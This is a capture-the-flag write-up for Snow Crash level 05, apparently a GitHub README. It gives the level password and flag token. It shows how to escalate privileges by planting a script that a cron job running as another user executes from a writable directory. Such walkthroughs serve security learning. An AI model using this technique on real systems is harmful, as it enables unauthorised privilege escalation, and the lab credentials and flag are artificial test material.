rparodi/snow-crash
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
snow-crash/snowcrash/level05/README.md

76 lines
2.1 KiB
Markdown
Raw Blame History

# Level 05
## how to login
username: level05
password: ne2searoevaevoem4ov4ar8ap
## Goal
run `getflag` as user `flag05`
## Actually doing something
```bash
level05@snowcrash.local.maix.me's password:
You have new mail.
level05@SnowCrash:~$
```
This is weird, the only mail I have is my chain mail !
Jokes aside, looking at the files in the user's home, there is nothing other than the default ones.
This reeks of old program though. Nobody check mails directly when they login like this.
From my times on wikipedia *not working* I know that `/var/mail` sometimes exists, lets check it
```bash
level05@SnowCrash:~$ ll /var/mail/level05
-rw-r--r--+ 1 root mail 58 Jan 19 13:44 /var/mail/level05
level05@SnowCrash:~$ cat /var/mail/level05
*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
```
Oh wow, this looks like a nice cronjob
if we decipher the old text, we get something like this:
> Every two minutes (0, 2, 4, etc...) run the command `su -c "sh /usr/sbin/openarenaserver" - flag05`
so `su -c "text"` means "please run `text` as X" and the `- flag05` means "use as `flag05` and not `root` as your user"
so this runs `/usr/sbin/openarenaserver` every two minutes as the user `flag05`
lets read that script
```bash
level05@SnowCrash:~$ cat /usr/sbin/openarenaserver
#!/bin/sh
for i in /opt/openarenaserver/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
```
It looks like it runs the files present in `/opt/openarenaserver` with a limit of 5s (cpu time) per process, and then remove that file
lets try to add a little script there (like say something that dumps the output of `getflag` to elsewhere?)
```bash
``level05@SnowCrash:~$ cat <<EOF >/tmp/getflag05
> #!/bin/sh
> getflag >/tmp/flag05
> chmod +r /tmp/flag05
> EOF
level05@SnowCrash:~$ chmod a+rx /tmp/getflag05
level05@SnowCrash:~$ ln -s /tmp/getflag05 /opt/openarenaserver/flag
level05@SnowCrash:~$ sleep 120 && cat /tmp/flag05
Check flag.Here is your token : viuaaale9huek52boumoomioc
```
And voila !
We had to write the result to another file since otherwise the data would be lost to the ether (crontab stdio)
Reference in a new issue View git blame Copy permalink